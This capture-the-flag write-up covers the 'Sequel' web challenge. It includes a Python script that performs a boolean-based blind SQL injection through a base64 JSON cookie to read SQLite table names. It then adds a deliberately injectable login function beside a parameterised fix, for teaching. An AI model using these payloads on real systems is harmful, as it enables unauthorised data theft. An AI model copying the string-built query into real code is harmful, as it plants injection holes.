Sequel

Brute-forced the login and got the credentials guest/guest.

Three of the entries came back as "no node for guest", which suggested privilege escalation was needed.

So I inspected the cookies and found a strange-looking one:

It turned out to be cookie injection: the login JSON carried in the cookie is concatenated into a SQLite query, so a boolean-based blind injection through the cookie can be used to brute-force the password character by character.

I did not write the script myself (see the reference link).

import requests
import base64
import string
import sys

# Blind-injection oracle: the 1337_AUTH cookie is base64(JSON) with username/password.
# The username is injected so that the query succeeds only when a table name in
# sqlite_master matches the guessed prefix; a successful login shows "Movie".
out = ""
while True:
    for letter in string.printable:
        tmp = out + letter
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(
            tmp + '%')
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        r = requests.get('http://9c61f34f-32c8-4eae-a49a-b9fa29a54546.node3.buuoj.cn/sequels',
                         cookies={"1337_AUTH": payload})
        if "Movie" in r.text:
            # Prefix confirmed: keep the character and move on to the next position.
            out = tmp
            sys.stdout.write(letter)
            sys.stdout.flush()
            break
    else:
        # No printable character extended the prefix: the name is complete.
        break
print()
# Note: '%' and '_' in string.printable are LIKE wildcards and will always match,
# so once the real name ends the script may start appending them; stop it then.
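To show why the cookie could be turned into a blind oracle, and what removes the bug, here is an added example (not code from the writeup or the challenge): a stand-in login check that formats the cookie's JSON fields into the SQL text next to the same check with bound parameters. It assumes an in-memory SQLite database with a users table and single-quoted string literals in the query; the real backend's schema and quoting are not shown on the page.

```python
import base64
import json
import sqlite3

# Constructed stand-in for the challenge's SQLite backend (assumption: a users table).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('guest', 'guest'), ('admin', 'PLACEHOLDER')")


def make_cookie(username, password):
    """Build a 1337_AUTH value: base64 of a JSON object, as the writeup's script does."""
    body = json.dumps({"username": username, "password": password}).encode()
    return base64.b64encode(body).decode()


def decode_cookie(value):
    return json.loads(base64.b64decode(value))


def login_vulnerable(cookie):
    """Query assembled with str.format: the cookie's fields become SQL text."""
    creds = decode_cookie(cookie)
    sql = "SELECT username FROM users WHERE username = '{}' AND password = '{}'".format(
        creds["username"], creds["password"])
    return db.execute(sql).fetchone() is not None


def login_fixed(cookie):
    """Same check with bound parameters: the fields are values, never SQL."""
    creds = decode_cookie(cookie)
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (creds["username"], creds["password"])).fetchone()
    return row is not None


def blind_probe(login, prefix):
    """The writeup's oracle: does a table whose name starts with `prefix` exist?
    Only the string-built query turns the login result into that answer."""
    injected = ("' OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE '{}%' LIMIT 1) OR '"
                .format(prefix))
    return login(make_cookie(injected, "guest"))


if __name__ == "__main__":
    print("guest/guest:", login_vulnerable(make_cookie("guest", "guest")),
          login_fixed(make_cookie("guest", "guest")))
    print("vulnerable oracle:", blind_probe(login_vulnerable, "use"), blind_probe(login_vulnerable, "zzz"))
    print("fixed oracle:", blind_probe(login_fixed, "use"), blind_probe(login_fixed, "zzz"))
```

With the parameterised query the injected username is compared as an ordinary string, so the probe returns False whether or not a matching table exists, and the side channel disappears.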
